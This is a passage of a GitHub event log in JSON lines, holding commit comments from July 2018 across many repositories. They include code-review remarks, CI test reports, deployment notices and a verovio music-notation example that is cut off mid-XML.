{"id":"7931504468","type":"CommitCommentEvent","actor":{"login":"rob-Hitchens"},"repo":{"name":"Djuliuss/Splitter"},"payload":{"comment":{"id":29627799,"position":26,"line":26,"path":"contracts/Splitter.sol","commit_id":"2d32daac6ff4f50707532a122cb93c69644935b9","created_at":"2018-07-07T00:56:05Z","updated_at":"2018-07-07T00:56:05Z","author_association":"NONE","body":"What do you think would happen if this function accepted two arguments for `address receiver1, address receiver2` instead of passing that information into the constructor?\r\n\r\nWe would like to push toward a re-usable utility that anyone can use to fairly split funds between any two other addresses. \"Stretch goals\" ;-)"}},"created_at":"2018-07-07T00:56:05Z"}
{"id":"7931505059","type":"CommitCommentEvent","actor":{"login":"rob-Hitchens"},"repo":{"name":"Djuliuss/Splitter"},"payload":{"comment":{"id":29627800,"position":42,"line":39,"path":"contracts/Splitter.sol","commit_id":"2d32daac6ff4f50707532a122cb93c69644935b9","created_at":"2018-07-07T00:56:32Z","updated_at":"2018-07-07T00:56:32Z","author_association":"NONE","body":"In the stretched goals version, anyone can use it. "}},"created_at":"2018-07-07T00:56:32Z"}
{"id":"7931505694","type":"CommitCommentEvent","actor":{"login":"matschaffer"},"repo":{"name":"Safecast/safecastapi"},"payload":{"comment":{"id":29627801,"position":5,"line":7,"path":"app/mailers/reminders.rb","commit_id":"67a77af9fe886689e19e9846a9c09677db9605ab","created_at":"2018-07-07T00:57:02Z","updated_at":"2018-07-07T00:57:02Z","author_association":"MEMBER","body":"Is the leading space here intentional or just copy paste error?"}},"created_at":"2018-07-07T00:57:02Z"}
{"id":"7931506341","type":"CommitCommentEvent","actor":{"login":"rob-Hitchens"},"repo":{"name":"Djuliuss/Splitter"},"payload":{"comment":{"id":29627802,"position":62,"line":48,"path":"contracts/Splitter.sol","commit_id":"2d32daac6ff4f50707532a122cb93c69644935b9","created_at":"2018-07-07T00:57:33Z","updated_at":"2018-07-07T00:57:33Z","author_association":"NONE","body":"This is not wrong, but you'll find it incompatible with the stretch goal version because it needs parameters fallback functions can't use. "}},"created_at":"2018-07-07T00:57:33Z"}
{"id":"7931506795","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29627804,"position":null,"line":null,"path":null,"commit_id":"54cc43a3e65dd17c01c8760715a4a570db56eb7a","created_at":"2018-07-07T00:57:54Z","updated_at":"2018-07-07T00:57:54Z","author_association":"NONE","body":"FanEnergyIndex (XuanLuoLBL) - x86_64-MacOS-10.9-clang: Tests Failed (1385 of 2932 tests passed, 0 test warnings)\n\n\n\nFailures:\n\n\nintegration Test Summary\n * Passed: 1\n * Failed: 624\n\nregression Test Summary\n * Passed: 621\n * Failed: 2\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-54cc43a3e65dd17c01c8760715a4a570db56eb7a-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-54cc43a3e65dd17c01c8760715a4a570db56eb7a-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-47.24%25-red.png)</a> \n"}},"created_at":"2018-07-07T00:57:54Z"}
{"id":"7931506905","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29627805,"position":null,"line":null,"path":null,"commit_id":"0b0cdec4495c9fab7c8617e3833cd4e6fb63ba6e","created_at":"2018-07-07T00:58:00Z","updated_at":"2018-07-07T00:58:00Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#pr-af-loons](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#pr-af-loons).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-af-loons-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-07T00:58:00Z"}
{"id":"7931510309","type":"CommitCommentEvent","actor":{"login":"rohanirohan1999"},"repo":{"name":"rohanirohan1999/MD-ROHAN"},"payload":{"comment":{"id":29627819,"position":null,"line":null,"path":null,"commit_id":"2ad56a1393bc3c2491232f88d6ba517615ee5314","created_at":"2018-07-07T01:00:26Z","updated_at":"2018-07-07T01:00:26Z","author_association":"OWNER","body":"JR."}},"created_at":"2018-07-07T01:00:26Z"}
{"id":"7931512089","type":"CommitCommentEvent","actor":{"login":"rohanirohan1999"},"repo":{"name":"rohanirohan1999/MD-ROHAN"},"payload":{"comment":{"id":29627821,"position":null,"line":null,"path":null,"commit_id":"2ad56a1393bc3c2491232f88d6ba517615ee5314","created_at":"2018-07-07T01:01:32Z","updated_at":"2018-07-07T01:01:32Z","author_association":"OWNER","body":"wow"}},"created_at":"2018-07-07T01:01:32Z"}
{"id":"7931513517","type":"CommitCommentEvent","actor":{"login":"rohanirohan1999"},"repo":{"name":"rohanirohan1999/MD-ROHAN"},"payload":{"comment":{"id":29627823,"position":null,"line":null,"path":null,"commit_id":"2ad56a1393bc3c2491232f88d6ba517615ee5314","created_at":"2018-07-07T01:02:40Z","updated_at":"2018-07-07T01:02:40Z","author_association":"OWNER","body":"Leave a comment\r\n"}},"created_at":"2018-07-07T01:02:40Z"}
{"id":"7931515649","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29627828,"position":null,"line":null,"path":null,"commit_id":"f0b10969a4c328dc04c152b97795a1c248cb9fc3","created_at":"2018-07-07T01:04:23Z","updated_at":"2018-07-07T01:04:23Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#pr-af-loons](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#pr-af-loons).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-af-loons-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-07T01:04:23Z"}
{"id":"7931520477","type":"CommitCommentEvent","actor":{"login":"wowwow21098"},"repo":{"name":"ChainsDD/su-binary"},"payload":{"comment":{"id":29627842,"position":1,"line":28,"path":"su.c","commit_id":"fc7479fab2d9d85c7c1f0bf1fee523a69d477a40","created_at":"2018-07-07T01:08:27Z","updated_at":"2018-07-07T01:08:27Z","author_association":"NONE","body":"#0 <su.h>"}},"created_at":"2018-07-07T01:08:27Z"}
{"id":"7931521036","type":"CommitCommentEvent","actor":{"login":"wowwow21098"},"repo":{"name":"ChainsDD/su-binary"},"payload":{"comment":{"id":29627843,"position":26,"line":264,"path":"su.c","commit_id":"fc7479fab2d9d85c7c1f0bf1fee523a69d477a40","created_at":"2018-07-07T01:08:54Z","updated_at":"2018-07-07T01:08:54Z","author_association":"NONE","body":"Command"}},"created_at":"2018-07-07T01:08:54Z"}
{"id":"7931523939","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29627846,"position":null,"line":null,"path":null,"commit_id":"24fadeb141efa463e3d15dc6349d169a61abea1f","created_at":"2018-07-07T01:11:20Z","updated_at":"2018-07-07T01:11:20Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#ci-426](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#ci-426).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-426-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-07T01:11:20Z"}
{"id":"7931528135","type":"CommitCommentEvent","actor":{"login":"aldenml"},"repo":{"name":"frostwire/frostwire"},"payload":{"comment":{"id":29627851,"position":27,"line":89,"path":"desktop/src/com/frostwire/gui/components/transfers/TransferDetailTrackersDataLine.java","commit_id":"220bb3ab15c886e20d242e57ae988f31efa05ce4","created_at":"2018-07-07T01:14:44Z","updated_at":"2018-07-07T01:14:44Z","author_association":"COLLABORATOR","body":"these additions are wrong, the tracker is the same, so you more likely are adding repeated peers. I recommend taking the max of them"}},"created_at":"2018-07-07T01:14:44Z"}
{"id":"7931537902","type":"CommitCommentEvent","actor":{"login":"sheprs"},"repo":{"name":"proycon/valkuil"},"payload":{"comment":{"id":29627862,"position":26,"line":241,"path":"processchain.py","commit_id":"36264936576a1ce68df290cf6f123e1cddd2f004","created_at":"2018-07-07T01:18:40Z","updated_at":"2018-07-07T01:18:40Z","author_association":"NONE","body":"Paula.herdtclemons@facebook "}},"created_at":"2018-07-07T01:18:40Z"}
{"id":"7931551511","type":"CommitCommentEvent","actor":{"login":"billpine"},"repo":{"name":"melimore86/Data"},"payload":{"comment":{"id":29627895,"position":null,"line":null,"path":null,"commit_id":"2d16bf42a1330331b8a1d67db8d8f00a2be2b0e1","created_at":"2018-07-07T01:30:36Z","updated_at":"2018-07-07T01:30:36Z","author_association":"NONE","body":"That's weird, yesterday I could download and read your word doc. Today I can't. The binary is listed as empty."}},"created_at":"2018-07-07T01:30:36Z"}
{"id":"7931553712","type":"CommitCommentEvent","actor":{"login":"jaydenseric"},"repo":{"name":"npm/hosted-git-info"},"payload":{"comment":{"id":29627898,"position":null,"line":null,"path":null,"commit_id":"c93148224547b0f541ca03bb706f196ae6e1f440","created_at":"2018-07-07T01:32:20Z","updated_at":"2018-07-07T01:32:20Z","author_association":"NONE","body":"@iarna I don't think this should have been published as a semver patch, it appears to be a breaking change! It seems to have broken my prepublish scripts:\r\n\r\n<img width=\"657\" alt=\"screen shot 2018-07-07 at 11 31 04 am\" src=\"https://user-images.githubusercontent.com/1754873/42405460-61faf00e-81d9-11e8-87a4-6145f85d1c3d.png\">\r\n"}},"created_at":"2018-07-07T01:32:20Z"}
{"id":"7931554523","type":"CommitCommentEvent","actor":{"login":"billpine"},"repo":{"name":"melimore86/Data"},"payload":{"comment":{"id":29627902,"position":null,"line":null,"path":null,"commit_id":"6ea0d35688924248de32e62cc62351ebcbec8069","created_at":"2018-07-07T01:33:04Z","updated_at":"2018-07-07T01:33:04Z","author_association":"NONE","body":"I find it appealing to keep the oyster data as simple flat files if possible. So the entry would be from Excel (likely working with Joe to make the entry as forms).  Adding another database is something I don't want to have to do unless it is required.  This is why the Portal project approach is interesting as they manage via flat files."}},"created_at":"2018-07-07T01:33:04Z"}
{"id":"7931558824","type":"CommitCommentEvent","actor":{"login":"JerryTsang"},"repo":{"name":"JerryTsang/android_kernel_sharp_msm8974"},"payload":{"comment":{"id":29627909,"position":null,"line":null,"path":null,"commit_id":"c2ba89c6b256cc21ae077888e3248121a5789cb3","created_at":"2018-07-07T01:36:57Z","updated_at":"2018-07-07T01:36:57Z","author_association":"OWNER","body":"你是适配pa24吗，能进cm ?"}},"created_at":"2018-07-07T01:36:57Z"}
{"id":"7931559375","type":"CommitCommentEvent","actor":{"login":"votaguz"},"repo":{"name":"frostwire/frostwire"},"payload":{"comment":{"id":29627910,"position":23,"line":85,"path":"desktop/src/com/frostwire/gui/components/transfers/TransferDetailTrackersDataLine.java","commit_id":"220bb3ab15c886e20d242e57ae988f31efa05ce4","created_at":"2018-07-07T01:37:22Z","updated_at":"2018-07-07T01:37:22Z","author_association":"COLLABORATOR","body":"Remember that I'm checking in every `endpoint` available for that `tracker`. So if, an active `endpoint` is found then `isActive` is true else will be `false`. "}},"created_at":"2018-07-07T01:37:22Z"}
{"id":"7931559820","type":"CommitCommentEvent","actor":{"login":"JukkeXiong"},"repo":{"name":"JukkeXiong/Web-design-with-HTML-CSS-JavaScript"},"payload":{"comment":{"id":29627911,"position":null,"line":null,"path":null,"commit_id":"593d8428b9953e166a13e43e7f9c1ba14342ccd0","created_at":"2018-07-07T01:37:43Z","updated_at":"2018-07-07T01:37:43Z","author_association":"OWNER","body":"I've never really used Github, and I'm currently just messing around to understand how it works, but Ill be posting my projects with HTML, CSS and JavaScript here. Feel free to check them out!"}},"created_at":"2018-07-07T01:37:43Z"}
{"id":"7931560114","type":"CommitCommentEvent","actor":{"login":"pankaj9310"},"repo":{"name":"pankaj9310/peatio"},"payload":{"comment":{"id":29627912,"position":null,"line":null,"path":null,"commit_id":"6848ecb0a231e17ea35b2a307d3c610b2f84f34e","created_at":"2018-07-07T01:37:58Z","updated_at":"2018-07-07T01:37:58Z","author_association":"OWNER","body":"Hi\r\nRun this command\r\nBundle exec rake solvency:liability_proof"}},"created_at":"2018-07-07T01:37:58Z"}
{"id":"7931561648","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29627915,"position":null,"line":null,"path":null,"commit_id":"c3325181045b3082690eff766212293083d3ebca","created_at":"2018-07-07T01:39:22Z","updated_at":"2018-07-07T01:39:22Z","author_association":"NONE","body":"#6712-Zone-Coil-Autosizing-does-not-include-impact-of-AirTerminalSingleDuctMixer (rraustad) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (2315 of 2315 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-c3325181045b3082690eff766212293083d3ebca-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-c3325181045b3082690eff766212293083d3ebca-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-c3325181045b3082690eff766212293083d3ebca-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.2%25-green.png)</a>\n"}},"created_at":"2018-07-07T01:39:22Z"}
{"id":"7931563470","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29627919,"position":null,"line":null,"path":null,"commit_id":"c3325181045b3082690eff766212293083d3ebca","created_at":"2018-07-07T01:40:48Z","updated_at":"2018-07-07T01:40:48Z","author_association":"NONE","body":"#6712-Zone-Coil-Autosizing-does-not-include-impact-of-AirTerminalSingleDuctMixer (rraustad) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-c3325181045b3082690eff766212293083d3ebca-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-07T01:40:48Z"}
{"id":"7931564352","type":"CommitCommentEvent","actor":{"login":"jaydenseric"},"repo":{"name":"npm/hosted-git-info"},"payload":{"comment":{"id":29627922,"position":null,"line":null,"path":null,"commit_id":"c93148224547b0f541ca03bb706f196ae6e1f440","created_at":"2018-07-07T01:41:35Z","updated_at":"2018-07-07T01:41:35Z","author_association":"NONE","body":"Reinstall just now fixed it. I think I was being effected by https://github.com/npm/hosted-git-info/issues/35 and mistook this fix with the cause."}},"created_at":"2018-07-07T01:41:35Z"}
{"id":"7931565588","type":"CommitCommentEvent","actor":{"login":"LDj3SNuD"},"repo":{"name":"gdkchan/Ryujinx"},"payload":{"comment":{"id":29627924,"position":17,"line":91,"path":"ChocolArm64/Instruction/AInstEmitSimdShift.cs","commit_id":"6e4aeff9e2c055b674f82860a74700a334d5bc6e","created_at":"2018-07-07T01:42:40Z","updated_at":"2018-07-07T01:42:40Z","author_association":"CONTRIBUTOR","body":"Use or not use (in general) `https://github.com/gdkchan/Ryujinx/blob/master/ChocolArm64/Instruction/AInstEmitSimdHelper.cs#L33` ?\r\nThe same below."}},"created_at":"2018-07-07T01:42:40Z"}
{"id":"7931568863","type":"CommitCommentEvent","actor":{"login":"victoriaogomes"},"repo":{"name":"viubis/Eng.-Software"},"payload":{"comment":{"id":29627932,"position":null,"line":null,"path":null,"commit_id":"97c6e894f40d58dd03a2dc58ef31d7db4dad9a80","created_at":"2018-07-07T01:45:35Z","updated_at":"2018-07-07T01:45:35Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Terminar aplicação de rede para módulo de pagamento](https://trello.com/c/P2z6SP4V/209-terminar-aplica%C3%A7%C3%A3o-de-rede-para-m%C3%B3dulo-de-pagamento)"}},"created_at":"2018-07-07T01:45:35Z"}
{"id":"7931568975","type":"CommitCommentEvent","actor":{"login":"victoriaogomes"},"repo":{"name":"viubis/Eng.-Software"},"payload":{"comment":{"id":29627933,"position":null,"line":null,"path":null,"commit_id":"c1088d3171beb73069d8041e900bd8d7365285f2","created_at":"2018-07-07T01:45:40Z","updated_at":"2018-07-07T01:45:40Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Terminar aplicação de rede para módulo de pagamento](https://trello.com/c/P2z6SP4V/209-terminar-aplica%C3%A7%C3%A3o-de-rede-para-m%C3%B3dulo-de-pagamento)"}},"created_at":"2018-07-07T01:45:40Z"}
{"id":"7931570118","type":"CommitCommentEvent","actor":{"login":"moneyworldjohn"},"repo":{"name":"firebase/quickstart-unity"},"payload":{"comment":{"id":29627936,"position":null,"line":null,"path":null,"commit_id":"9f819e241fc955599227eef6c66a554a319091dd","created_at":"2018-07-07T01:46:45Z","updated_at":"2018-07-07T01:46:45Z","author_association":"NONE","body":"Focus unity"}},"created_at":"2018-07-07T01:46:45Z"}
{"id":"7931570937","type":"CommitCommentEvent","actor":{"login":"LDj3SNuD"},"repo":{"name":"gdkchan/Ryujinx"},"payload":{"comment":{"id":29627937,"position":64,"line":341,"path":"ChocolArm64/Instruction/AInstEmitSimdShift.cs","commit_id":"6e4aeff9e2c055b674f82860a74700a334d5bc6e","created_at":"2018-07-07T01:47:27Z","updated_at":"2018-07-07T01:47:27Z","author_association":"CONTRIBUTOR","body":"Wouldn't it be better to avoid having to recalculate this value with every loop?\r\nTherefore: `Index < Elems`."}},"created_at":"2018-07-07T01:47:27Z"}
{"id":"7931573786","type":"CommitCommentEvent","actor":{"login":"andrewsdavis"},"repo":{"name":"andrewsdavis/Quark"},"payload":{"comment":{"id":29627938,"position":null,"line":null,"path":null,"commit_id":"4227371275b3def62dfc6d7f43aa6969f4483c2d","created_at":"2018-07-07T01:49:59Z","updated_at":"2018-07-07T01:49:59Z","author_association":"OWNER","body":"Updated Install for [v1.0](https://github.com/andrewsdavis/Quark/releases/tag/v1.0) on 7/1/2018"}},"created_at":"2018-07-07T01:49:59Z"}
{"id":"7931575142","type":"CommitCommentEvent","actor":{"login":"appsmipymes"},"repo":{"name":"appsmipymes/Repo-clasegit"},"payload":{"comment":{"id":29627939,"position":null,"line":null,"path":null,"commit_id":"25d211a3809bcd8c272427a31f7b4e8edcf181bf","created_at":"2018-07-07T01:51:10Z","updated_at":"2018-07-07T01:51:10Z","author_association":"OWNER","body":"Hola estamos en streming pueden unirse,  Es de Git"}},"created_at":"2018-07-07T01:51:10Z"}
{"id":"7931575749","type":"CommitCommentEvent","actor":{"login":"Akshay-Venkatesh"},"repo":{"name":"bureddy/ucx"},"payload":{"comment":{"id":29627940,"position":187,"line":187,"path":"src/uct/cuda/cuda_ipc/cuda_ipc_cache.c","commit_id":"0dec2eb21157fb3c6d20188a16e368e73ad10951","created_at":"2018-07-07T01:51:44Z","updated_at":"2018-07-07T01:51:44Z","author_association":"NONE","body":"When will this case occur? Won't ```uct_cuda_ipc_cache_invalidate_regions``` prevent this situation?"}},"created_at":"2018-07-07T01:51:44Z"}
{"id":"7931578658","type":"CommitCommentEvent","actor":{"login":"nixel2007"},"repo":{"name":"silverbulleters/ovm"},"payload":{"comment":{"id":29627946,"position":null,"line":null,"path":null,"commit_id":"a2c16c7637b212b399019ee7184edd659e0c4fea","created_at":"2018-07-07T01:54:25Z","updated_at":"2018-07-07T01:54:25Z","author_association":"COLLABORATOR","body":"Веткииии :( может лучше черри-пиком, раз уж сначала в мастер вместо девелопа? "}},"created_at":"2018-07-07T01:54:25Z"}
{"id":"7931581923","type":"CommitCommentEvent","actor":{"login":"NEDCampDev"},"repo":{"name":"NEDCamp/nedcamp"},"payload":{"comment":{"id":29627952,"position":null,"line":null,"path":null,"commit_id":"befb981236d1d0e9c8d0a51b9f4ead5719d48c8e","created_at":"2018-07-07T01:57:28Z","updated_at":"2018-07-07T01:57:28Z","author_association":"COLLABORATOR","body":"Created multidev environment [nedcamp#ci-110](https://dashboard.pantheon.io/sites/1e9ab33c-01d3-42bd-bb42-5008333172a3#ci-110).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-110-nedcamp.pantheonsite.io/)"}},"created_at":"2018-07-07T01:57:28Z"}
{"id":"7931582225","type":"CommitCommentEvent","actor":{"login":"fungilation"},"repo":{"name":"facebook/react-native"},"payload":{"comment":{"id":29627953,"position":null,"line":null,"path":null,"commit_id":"5ae97990418db613cd67b1fb9070ece976d17dc7","created_at":"2018-07-07T01:57:45Z","updated_at":"2018-07-07T01:57:45Z","author_association":"NONE","body":"Moving NDK support to r17 soon? Because it RN android apps [doesn't build on 17](https://github.com/facebook/react-native/issues/19321), and 17 is installed by Android Studio with no managed way to select a different version like 16."}},"created_at":"2018-07-07T01:57:45Z"}
{"id":"7931582675","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29627955,"position":null,"line":null,"path":null,"commit_id":"a72e4454c3031860290fc119785945eb62ec2c9c","created_at":"2018-07-07T01:58:09Z","updated_at":"2018-07-07T01:58:09Z","author_association":"NONE","body":"FanEnergyIndex (XuanLuoLBL) - x86_64-MacOS-10.9-clang: OK (2932 of 2932 tests passed, 8 test warnings)\n\nMessages:\n\n * 8 tests had: AUD diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a72e4454c3031860290fc119785945eb62ec2c9c-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a72e4454c3031860290fc119785945eb62ec2c9c-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-07T01:58:09Z"}
{"id":"7931583742","type":"CommitCommentEvent","actor":{"login":"Akshay-Venkatesh"},"repo":{"name":"bureddy/ucx"},"payload":{"comment":{"id":29627958,"position":215,"line":215,"path":"src/uct/cuda/cuda_ipc/cuda_ipc_cache.c","commit_id":"0dec2eb21157fb3c6d20188a16e368e73ad10951","created_at":"2018-07-07T01:59:09Z","updated_at":"2018-07-07T01:59:09Z","author_association":"NONE","body":"Should we be aligning GPU virtual addresses to a lower power of 2? They may not be valid for access in the worst case. BTW, I need to check this myself. I'll confirm."}},"created_at":"2018-07-07T01:59:09Z"}
{"id":"7932105806","type":"CommitCommentEvent","actor":{"login":"Tommy228"},"repo":{"name":"Tommy228/tttdamagelogs"},"payload":{"comment":{"id":29629170,"position":22,"line":20,"path":"moon/tttdamagelogs/modules/mysql/sv_players.moon","commit_id":"2164e6b166be90784c82d51a3ded2530ae652efc","created_at":"2018-07-07T10:01:02Z","updated_at":"2018-07-07T10:01:02Z","author_association":"OWNER","body":"`for ply in *player.GetHumans!`"}},"created_at":"2018-07-07T10:01:02Z"}
{"id":"7932108022","type":"CommitCommentEvent","actor":{"login":"AbigailBuccaneer"},"repo":{"name":"wiremod/wire"},"payload":{"comment":{"id":29629172,"position":5,"line":97,"path":"lua/entities/gmod_wire_expression2/core/init.lua","commit_id":"3d6ff50a37d9c91c542cf58895623a5394561289","created_at":"2018-07-07T10:02:48Z","updated_at":"2018-07-07T10:02:48Z","author_association":"CONTRIBUTOR","body":"`return id:match(\"^x..$\") or id:match(\"^[^x]$\")` seems less readable to me. than the code I wrote. Feel free to open a pull request where it can be discussed though."}},"created_at":"2018-07-07T10:02:48Z"}
{"id":"7932108064","type":"CommitCommentEvent","actor":{"login":"pankajgunale11"},"repo":{"name":"pankajgunale11/project-tutotrial"},"payload":{"comment":{"id":29629173,"position":1,"line":1,"path":"images","commit_id":"dd62e72f1c06a88b3454c38038c020561af6be18","created_at":"2018-07-07T10:02:51Z","updated_at":"2018-07-07T10:02:51Z","author_association":"OWNER","body":"![1-s2 0-s0921889014001821-gr4](https://user-images.githubusercontent.com/40167130/42409637-f8abedac-81fa-11e8-8d98-fc8a1e252ebd.jphi"}},"created_at":"2018-07-07T10:02:51Z"}
{"id":"7932108263","type":"CommitCommentEvent","actor":{"login":"jaycee4u"},"repo":{"name":"jaycee4u/Loan_Prediction_R"},"payload":{"comment":{"id":29629174,"position":null,"line":null,"path":null,"commit_id":"2727b71f031b672dfaac6ded6caed01f6a7c20ed","created_at":"2018-07-07T10:03:02Z","updated_at":"2018-07-07T10:03:02Z","author_association":"OWNER","body":"step wise regression bein tried\r\n"}},"created_at":"2018-07-07T10:03:02Z"}
{"id":"7932110986","type":"CommitCommentEvent","actor":{"login":"zinzuwadiyamanish"},"repo":{"name":"zinzuwadiyamanish/hello-world"},"payload":{"comment":{"id":29629176,"position":null,"line":null,"path":null,"commit_id":"23eff9300f3a717d54585fce804465a7576e53e1","created_at":"2018-07-07T10:05:27Z","updated_at":"2018-07-07T10:05:27Z","author_association":"OWNER","body":"All good"}},"created_at":"2018-07-07T10:05:27Z"}
{"id":"7932111848","type":"CommitCommentEvent","actor":{"login":"danleekai"},"repo":{"name":"danleekai/C"},"payload":{"comment":{"id":29629180,"position":null,"line":null,"path":null,"commit_id":"8ca9e85d6ebd43d209f21d00a8fa6038b2995125","created_at":"2018-07-07T10:06:12Z","updated_at":"2018-07-07T10:06:12Z","author_association":"OWNER","body":"Easy-1"}},"created_at":"2018-07-07T10:06:12Z"}
{"id":"7932124950","type":"CommitCommentEvent","actor":{"login":"craigsapp"},"repo":{"name":"rism-ch/verovio"},"payload":{"comment":{"id":29629197,"position":null,"line":null,"path":null,"commit_id":"b1119801264152f8c1f412077a23c4106bfdb420","created_at":"2018-07-07T10:17:58Z","updated_at":"2018-07-07T10:17:58Z","author_association":"CONTRIBUTOR","body":"This commit fixes trill extension lines so that they stop before the last grace-note trill notes of the trill in the Humdrum-to-MEI converter.\r\n\r\nExample:\r\n\r\n<img width=\"1096\" alt=\"screen shot 2018-07-07 at 12 08 22 pm\" src=\"https://user-images.githubusercontent.com/3487289/42409710-94fd27a6-81de-11e8-9b2a-03200cae2eb2.png\">\r\n\r\nThe first two trills now stop at the grace notes.  Note that the third trill should have a trill line, but there is a bug in verovio when the trill line extends over a barline and  ends on a grace note (or at least uses `@endid` rather than`@tstamp2`).  See issue https://github.com/rism-ch/verovio/issues/908\r\n\r\nExample Humdrum data:\r\n\r\n```\r\n**kern\r\n*M4/4\r\n=1\r\n1cTT\r\n8qd\r\n=\r\n2ett\r\n2ettt\r\n16qfLL\r\n16qgJJ\r\n=\r\n1ett\r\n=\r\n1ettt\r\n16qfLL\r\n16qgJJ\r\n=\r\n1a\r\n==\r\n*-\r\n```\r\n\r\nConversion to MEI:\r\n\r\n```xml\r\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\r\n<?xml-model href=\"http://music-encoding.org/schema/4.0.0/mei-all.rng\" type=\"application/xml\" schematypens=\"http://relaxng.org/ns/structure/1.0\"?>\r\n<?xml-model href=\"http://music-encoding.org/schema/4.0.0/mei-all.rng\" type=\"application/xml\" schematypens=\"http://purl.oclc.org/dsdl/schematron\"?>\r\n<mei xmlns=\"http://www.music-encoding.org/ns/mei\" meiversion=\"4.0.0\">\r\n    <meiHead>\r\n        <fileDesc>\r\n            <titleStmt>\r\n                <title />\r\n            </titleStmt>\r\n            <pubStmt />\r\n        </fileDesc>\r\n        <encodingDesc>\r\n            <appInfo>\r\n                <application isodate=\"2018-07-07T12:12:11\" version=\"2.0.0-dev-e22c4bd\">\r\n                    <name>Verovio</name>\r\n                    <p>Transcoded from Humdrum</p>\r\n                </application>\r\n            </appInfo>\r\n        </encodingDesc>\r\n        <workDesc>\r\n            <work>\r\n                <titleStmt>\r\n                    <title />\r\n                </titleStmt>\r\n            </work>\r\n        </workDesc>\r\n    </meiHead>\r\n    <music>\r\n        <body>\r\n            <mdiv xml:id=\"mdiv-0000001288523150\">\r\n                <score xml:id=\"score-0000000983485702\">\r\n                    <scoreDef xml:id=\"scoredef-0000001036061518\" midi.bpm=\"400\">\r\n                        <staffGrp xml:id=\"staffgrp-0000001203229552\">\r\n                            <staffDef xml:id=\"staffdef-0000001957450947\" clef.shape=\"G\" clef.line=\"2\" meter.count=\"4\" meter.unit=\"4\" n=\"1\" lines=\"5\">\r\n                                <label xml:id=\"label-0000000865488459\" />\r\n                            </staffDef>\r\n                        </staffGrp>\r\n                    </scoreDef>\r\n                    <section xml:id=\"section-L1F1\">\r\n                        <measure xml:id=\"measure-L3\" n=\"1\">\r\n                            <staff xml:id=\"staff-L3F1N1\" n=\"1\">\r\n                                <layer xml:id=\"layer-L3F1N1\" n=\"1\">\r\n                                    <note xml:id=\"note-L4F1\" dur=\"1\" oct=\"4\" pname=\"c\" accid.ges=\"n\" />\r\n                                    <note xml:id=\"note-L5F1\" dur=\"8\" oct=\"4\" pname=\"d\" grace=\"unacc\" accid.ges=\"n\" />\r\n                                </layer>\r\n                            </staff>\r\n                            <trill xml:id=\"trill-L4F1\" staff=\"1\" startid=\"#note-L4F1\" 